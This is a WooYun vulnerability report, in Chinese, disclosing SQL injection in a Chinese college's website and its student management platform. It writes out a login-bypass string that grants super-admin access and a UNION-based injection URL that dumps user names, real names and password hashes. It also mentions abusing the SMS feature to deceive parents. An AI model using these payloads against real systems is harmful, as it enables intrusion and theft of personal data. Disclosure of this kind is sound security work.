当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169712

漏洞标题:中北信商SQL注入

相关厂商:中北大学信息商务学院

漏洞作者: 路人甲

提交时间:2016-01-20 17:01

修复时间:2016-03-04 13:27

公开时间:2016-03-04 13:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-20: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-03-04: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中北信商官网存在很多SQL注入,其中学生信息管理平台安全问题特别严重!

详细说明:

从这里进.png


URL: **.**.**.**:7001/xsgl/
User: admin' or '1'='1
Pass: admin
立马进入后台,权限是"超级管理员"


直接进入管理平台.png


看看他都些什么功能

功能.png


其中这个发短信提醒功能最有可能被不法分子利用,稍微伪装一下,就能骗到很多家长

发短信的功能.png


在考勤那块看到一个笑点:“下蛋”? 几个意思??

下蛋.png


我估计这个网站是不怎么维护的 随便点击一个官网上面的网站

http://**.**.**.**/cms/shownews.php?id=-3666%20union%20select%201,user(),database(),group_concat(id,0x5c,username,0x5c,realname,0x5c,password,0x3C62723E),5,6,7,8,9,10,11,12,13,14%20from%20cms_user


官网随便点击一个链接.png


密码格式md5(md5(pass))

漏洞证明:

如上,马赛克走起...

修复方案:

要么升级,要么全部更换!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:暂时无回应

漏洞Rank:0

确认时间:2016-01-20 17:01

厂商回复:

最新状态:

暂无